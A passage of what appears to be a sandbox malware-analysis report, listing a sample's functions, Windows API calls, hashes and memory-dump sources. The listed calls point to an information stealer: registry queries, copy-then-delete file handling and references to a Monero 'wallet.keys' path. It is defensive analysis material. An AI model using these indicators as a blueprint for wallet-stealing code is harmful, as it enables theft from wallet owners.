                          • Instruction ID: d6b4ece2152368ae2b0b4e7f09dc72b35ae4464d934126352d27b7999d7da6b2
                          • Opcode Fuzzy Hash: dd8b406df14117b40a66442ff046d7e80d96a7e7220d95f88e39ac408fcda273
                          • Instruction Fuzzy Hash: 9F4189B6900208ABDB14EBE4DC46FFE777DAB48300F404598B75597181EA759B888BE2
                          Function 00B06920 Relevance: 7.6, APIs: 5, Instructions: 67timeCOMMON
                          Download Yara Rule
                          APIs
                          • GetSystemTime.KERNEL32(?), ref: 00B0696C
                          • sscanf.NTDLL ref: 00B06999
                          • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 00B069B2
                          • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 00B069C0
                          • ExitProcess.KERNEL32 ref: 00B069DA
                          Memory Dump Source
                          • Source File: 00000000.00000002.2180733460.0000000000AF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AF0000, based on PE: true
                          • Associated: 00000000.00000002.2180712635.0000000000AF0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180733460.0000000000BA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180733460.0000000000BAD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180733460.0000000000BD2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180733460.0000000000D3A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000D4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000EC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000FAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000FCA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000FD4000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000FE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2181799912.0000000000FE3000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2182346954.0000000001179000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2182459052.000000000117A000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_af0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Time$System$File$ExitProcesssscanf
                          • String ID:
                          • API String ID: 2533653975-0
                          • Opcode ID: 8cbb200d59cca25b86698f3912d04f55b959108e2f81227103d4326e97231c48
                          • Instruction ID: c592f9ae6debef8b358f8c854a5ba1fc4fdad973720448ee5e10f3aba06090db
                          • Opcode Fuzzy Hash: 8cbb200d59cca25b86698f3912d04f55b959108e2f81227103d4326e97231c48
                          • Instruction Fuzzy Hash: 0C21CBB5E14209ABCF04EFE8D945AEEBBF5FF48300F04856AE406E3250EB345615CBA5
                          Function 00B07E00 Relevance: 7.6, APIs: 5, Instructions: 58registrymemoryCOMMON
                          Download Yara Rule
                          APIs
                          • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00B07E37
                          • RtlAllocateHeap.NTDLL(00000000), ref: 00B07E3E
                          • RegOpenKeyExA.ADVAPI32(80000002,0189BDF0,00000000,00020119,?), ref: 00B07E5E
                          • RegQueryValueExA.ADVAPI32(?,018AE728,00000000,00000000,000000FF,000000FF), ref: 00B07E7F
                          • RegCloseKey.ADVAPI32(?), ref: 00B07E92
                          Memory Dump Source
                          • Source File: 00000000.00000002.2180733460.0000000000AF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AF0000, based on PE: true
                          • Associated: 00000000.00000002.2180712635.0000000000AF0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180733460.0000000000BA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180733460.0000000000BAD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180733460.0000000000BD2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180733460.0000000000D3A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000D4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000EC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000FAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000FCA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000FD4000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000FE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2181799912.0000000000FE3000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2182346954.0000000001179000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2182459052.000000000117A000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_af0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$AllocateCloseOpenProcessQueryValue
                          • String ID:
                          • API String ID: 3225020163-0
                          • Opcode ID: 5a6b6e49d84f991543543a7f9e237a91a41ed691f8be16217321bebe1b068287
                          • Instruction ID: 3de29bb52b8e7a7496b456826006091ab5d7f1dc8ba854707393b730951e9906
                          • Opcode Fuzzy Hash: 5a6b6e49d84f991543543a7f9e237a91a41ed691f8be16217321bebe1b068287
                          • Instruction Fuzzy Hash: 49113AB1A44305ABD700DB98DD89FBBFBBCEB04B10F104199F605E7280DBB468018BA1
                          Function 00B09260 Relevance: 7.5, APIs: 4, Strings: 1, Instructions: 41stringCOMMON
                          Download Yara Rule
                          APIs
                          • StrStrA.SHLWAPI(018AEFF0,?,?,?,00B0140C,?,018AEFF0,00000000), ref: 00B0926C
                          • lstrcpyn.KERNEL32(00D3AB88,018AEFF0,018AEFF0,?,00B0140C,?,018AEFF0), ref: 00B09290
                          • lstrlen.KERNEL32(?,?,00B0140C,?,018AEFF0), ref: 00B092A7
                          • wsprintfA.USER32 ref: 00B092C7
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2180733460.0000000000AF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AF0000, based on PE: true
                          • Associated: 00000000.00000002.2180712635.0000000000AF0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180733460.0000000000BA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180733460.0000000000BAD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180733460.0000000000BD2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180733460.0000000000D3A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000D4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000EC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000FAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000FCA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000FD4000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000FE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2181799912.0000000000FE3000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2182346954.0000000001179000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2182459052.000000000117A000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_af0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpynlstrlenwsprintf
                          • String ID: %s%s
                          • API String ID: 1206339513-3252725368
                          • Opcode ID: 5eef92e01f465854d2fd4628fac31f301438f02e7454422925912cc311543993
                          • Instruction ID: 8baffe7938fcd0b6335f2bc509bd44dc8cfbc9d2e05a29676d8cbb15fd846bc4
                          • Opcode Fuzzy Hash: 5eef92e01f465854d2fd4628fac31f301438f02e7454422925912cc311543993
                          • Instruction Fuzzy Hash: CB01DA75600208FFCB04DFECC989EAE7BB9EF48355F108588F9499B345C671AA40DBA1
                          Function 00AF12A0 Relevance: 7.5, APIs: 5, Instructions: 39registrymemoryCOMMON
                          Download Yara Rule
                          APIs
                          • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00AF12B4
                          • RtlAllocateHeap.NTDLL(00000000), ref: 00AF12BB
                          • RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 00AF12D7
                          • RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 00AF12F5
                          • RegCloseKey.ADVAPI32(?), ref: 00AF12FF
                          Memory Dump Source
                          • Source File: 00000000.00000002.2180733460.0000000000AF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AF0000, based on PE: true
                          • Associated: 00000000.00000002.2180712635.0000000000AF0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180733460.0000000000BA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180733460.0000000000BAD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180733460.0000000000BD2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180733460.0000000000D3A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000D4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000EC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000FAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000FCA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000FD4000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000FE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2181799912.0000000000FE3000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2182346954.0000000001179000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2182459052.000000000117A000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_af0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$AllocateCloseOpenProcessQueryValue
                          • String ID:
                          • API String ID: 3225020163-0
                          • Opcode ID: ca34fe320c6ebbf797b39a334bff76bf78090d6bc24b9d6717e0af2969ff714b
                          • Instruction ID: 0d592c7d2fbdbe2f244f57aae2ffecbff27bbb515bdf8915930090900ebe9779
                          • Opcode Fuzzy Hash: ca34fe320c6ebbf797b39a334bff76bf78090d6bc24b9d6717e0af2969ff714b
                          • Instruction Fuzzy Hash: 6A01E1B9B40308BBDB04DFE4DC89FAEB7B8EB48701F108159FA45D7280D6759A058FA1
                          Function 00B0C84E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 129COMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2180733460.0000000000AF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AF0000, based on PE: true
                          • Associated: 00000000.00000002.2180712635.0000000000AF0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180733460.0000000000BA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180733460.0000000000BAD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180733460.0000000000BD2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180733460.0000000000D3A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000D4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000EC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000FAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000FCA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000FD4000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000FE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2181799912.0000000000FE3000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2182346954.0000000001179000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2182459052.000000000117A000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_af0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: String___crt$Type
                          • String ID:
                          • API String ID: 2109742289-3916222277
                          • Opcode ID: 3630829c4f5fd70d6739ced872021ae8f0cce57f4a3c1035077c16d4c84bc3f6
                          • Instruction ID: e088bd86bdb9add10dc34189b6128f43e040ac678c3a73ca152cce14f4a511a8
                          • Opcode Fuzzy Hash: 3630829c4f5fd70d6739ced872021ae8f0cce57f4a3c1035077c16d4c84bc3f6
                          • Instruction Fuzzy Hash: 5B41F5B110079C5EDB228B248D84FFBBFE8EB45704F1445E8E98A861C2D3719A44CF24
                          Function 00B06630 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 70COMMON
                          Download Yara Rule
                          APIs
                          • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,0000003C,?,000003E8), ref: 00B06663
                            • Part of subcall function 00B0A740: lstrcpy.KERNEL32(00B10E17,00000000), ref: 00B0A788
                            • Part of subcall function 00B0A9B0: lstrlen.KERNEL32(?,018A89C8,?,\Monero\wallet.keys,00B10E17), ref: 00B0A9C5
                            • Part of subcall function 00B0A9B0: lstrcpy.KERNEL32(00000000), ref: 00B0AA04
                            • Part of subcall function 00B0A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00B0AA12
                            • Part of subcall function 00B0A8A0: lstrcpy.KERNEL32(?,00B10E17), ref: 00B0A905
                          • ShellExecuteEx.SHELL32(0000003C), ref: 00B06726
                          • ExitProcess.KERNEL32 ref: 00B06755
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2180733460.0000000000AF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AF0000, based on PE: true
                          • Associated: 00000000.00000002.2180712635.0000000000AF0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180733460.0000000000BA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180733460.0000000000BAD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180733460.0000000000BD2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180733460.0000000000D3A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000D4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000EC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000FAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000FCA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000FD4000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000FE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2181799912.0000000000FE3000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2182346954.0000000001179000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2182459052.000000000117A000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_af0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$ExecuteExitFileModuleNameProcessShelllstrcatlstrlen
                          • String ID: <
                          • API String ID: 1148417306-4251816714
                          • Opcode ID: f68536779019cd5bfc1c2f25b41008777fda85b189df0103e38b5d1107bc37b2
                          • Instruction ID: 1038cd710ba5033a95f00f1c5a65b6ca9e4d1f419dfd2a88d0ce4b238dfe0475
                          • Opcode Fuzzy Hash: f68536779019cd5bfc1c2f25b41008777fda85b189df0103e38b5d1107bc37b2
                          • Instruction Fuzzy Hash: 4D314DB1901308AADB14EB54DC81FDEBBB8AF14300F405589F249A61D1DF746B48CFA6
                          Function 00B087C0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 64memoryCOMMON
                          Download Yara Rule
                          APIs
                          • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00B10E28,00000000,?), ref: 00B0882F
                          • RtlAllocateHeap.NTDLL(00000000), ref: 00B08836
                          • wsprintfA.USER32 ref: 00B08850
                            • Part of subcall function 00B0A740: lstrcpy.KERNEL32(00B10E17,00000000), ref: 00B0A788
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2180733460.0000000000AF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AF0000, based on PE: true
                          • Associated: 00000000.00000002.2180712635.0000000000AF0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180733460.0000000000BA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180733460.0000000000BAD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180733460.0000000000BD2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180733460.0000000000D3A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000D4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000EC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000FAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000FCA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000FD4000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000FE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2181799912.0000000000FE3000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2182346954.0000000001179000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2182459052.000000000117A000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_af0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$AllocateProcesslstrcpywsprintf
                          • String ID: %dx%d
                          • API String ID: 1695172769-2206825331
                          • Opcode ID: b867011ada102f0a6dd7adab6d52682c3940130650134c18adc4404b72b37e02
                          • Instruction ID: a20293f08610a1328d7b4cbf74c2140c31883526b956f2f746b570be694a5e66
                          • Opcode Fuzzy Hash: b867011ada102f0a6dd7adab6d52682c3940130650134c18adc4404b72b37e02
                          • Instruction Fuzzy Hash: D721E7B1A44308ABDB04DF98DD49FAEBBB8FB48B11F104159F645E7390C779A9018BA1
                          Function 00B08D50 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 20memoryCOMMON
                          Download Yara Rule
                          APIs
                          • GetProcessHeap.KERNEL32(00000000,000000FA,?,?,00B0951E,00000000), ref: 00B08D5B
                          • RtlAllocateHeap.NTDLL(00000000), ref: 00B08D62
                          • wsprintfW.USER32 ref: 00B08D78
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2180733460.0000000000AF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AF0000, based on PE: true
                          • Associated: 00000000.00000002.2180712635.0000000000AF0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180733460.0000000000BA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180733460.0000000000BAD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180733460.0000000000BD2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180733460.0000000000D3A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000D4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000EC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000FAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000FCA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000FD4000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000FE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2181799912.0000000000FE3000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2182346954.0000000001179000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2182459052.000000000117A000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_af0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$AllocateProcesswsprintf
                          • String ID: %hs
                          • API String ID: 769748085-2783943728
                          • Opcode ID: c9684378fdd74260710f2f21a88ab1557c827535795ca0ddd70232694ddf938e
                          • Instruction ID: 2d9035450ceaabb699b645428d19c7343c04a2bb1187168be2e43b5797207cee
                          • Opcode Fuzzy Hash: c9684378fdd74260710f2f21a88ab1557c827535795ca0ddd70232694ddf938e
                          • Instruction Fuzzy Hash: 88E08CB0B40308FBC700DB98DC0EE69B7B8EB04702F000194FD4AC7380DA719E009BA2
                          Function 00AFA260 Relevance: 6.4, APIs: 4, Instructions: 370filestringCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00B0A740: lstrcpy.KERNEL32(00B10E17,00000000), ref: 00B0A788
                            • Part of subcall function 00B0A9B0: lstrlen.KERNEL32(?,018A89C8,?,\Monero\wallet.keys,00B10E17), ref: 00B0A9C5
                            • Part of subcall function 00B0A9B0: lstrcpy.KERNEL32(00000000), ref: 00B0AA04
                            • Part of subcall function 00B0A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00B0AA12
                            • Part of subcall function 00B0A8A0: lstrcpy.KERNEL32(?,00B10E17), ref: 00B0A905
                            • Part of subcall function 00B08B60: GetSystemTime.KERNEL32(00B10E1A,018AEBF0,00B105AE,?,?,00AF13F9,?,0000001A,00B10E1A,00000000,?,018A89C8,?,\Monero\wallet.keys,00B10E17), ref: 00B08B86
                            • Part of subcall function 00B0A920: lstrcpy.KERNEL32(00000000,?), ref: 00B0A972
                            • Part of subcall function 00B0A920: lstrcat.KERNEL32(00000000), ref: 00B0A982
                          • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00AFA2E1
                          • lstrlen.KERNEL32(00000000,00000000), ref: 00AFA3FF
                          • lstrlen.KERNEL32(00000000), ref: 00AFA6BC
                            • Part of subcall function 00B0A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00B0A7E6
                          • DeleteFileA.KERNEL32(00000000), ref: 00AFA743
                          Memory Dump Source
                          • Source File: 00000000.00000002.2180733460.0000000000AF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AF0000, based on PE: true
                          • Associated: 00000000.00000002.2180712635.0000000000AF0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180733460.0000000000BA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180733460.0000000000BAD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180733460.0000000000BD2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180733460.0000000000D3A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000D4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000EC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000FAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000FCA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000FD4000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000FE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2181799912.0000000000FE3000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2182346954.0000000001179000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2182459052.000000000117A000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_af0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                          • String ID:
                          • API String ID: 211194620-0
                          • Opcode ID: 1e4619e63398dcae8d0ed8ec2190ede370b823aaf1364aa1a9320dbac69c57a4
                          • Instruction ID: be7c1942782c9de2d2e0e66ee7eaf5b175e2bd4dec54efc5f847d9fe122ec98b
                          • Opcode Fuzzy Hash: 1e4619e63398dcae8d0ed8ec2190ede370b823aaf1364aa1a9320dbac69c57a4
                          • Instruction Fuzzy Hash: CEE1EE729103089ADB04FBA4DD96EEE777CAF24300F508999F516B60D1EF346A49CB72
                          Function 00AFD400 Relevance: 6.3, APIs: 4, Instructions: 252filestringCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00B0A740: lstrcpy.KERNEL32(00B10E17,00000000), ref: 00B0A788
                            • Part of subcall function 00B0A9B0: lstrlen.KERNEL32(?,018A89C8,?,\Monero\wallet.keys,00B10E17), ref: 00B0A9C5
                            • Part of subcall function 00B0A9B0: lstrcpy.KERNEL32(00000000), ref: 00B0AA04
                            • Part of subcall function 00B0A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00B0AA12
                            • Part of subcall function 00B0A8A0: lstrcpy.KERNEL32(?,00B10E17), ref: 00B0A905
                            • Part of subcall function 00B08B60: GetSystemTime.KERNEL32(00B10E1A,018AEBF0,00B105AE,?,?,00AF13F9,?,0000001A,00B10E1A,00000000,?,018A89C8,?,\Monero\wallet.keys,00B10E17), ref: 00B08B86
                            • Part of subcall function 00B0A920: lstrcpy.KERNEL32(00000000,?), ref: 00B0A972
                            • Part of subcall function 00B0A920: lstrcat.KERNEL32(00000000), ref: 00B0A982
                          • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00AFD481
                          • lstrlen.KERNEL32(00000000), ref: 00AFD698
                          • lstrlen.KERNEL32(00000000), ref: 00AFD6AC
                          • DeleteFileA.KERNEL32(00000000), ref: 00AFD72B
                          Memory Dump Source
                          • Source File: 00000000.00000002.2180733460.0000000000AF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AF0000, based on PE: true
                          • Associated: 00000000.00000002.2180712635.0000000000AF0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180733460.0000000000BA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180733460.0000000000BAD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180733460.0000000000BD2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180733460.0000000000D3A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000D4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000EC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000FAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000FCA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000FD4000.00000040.00000001.01000000.00000003.sdmpDownload File
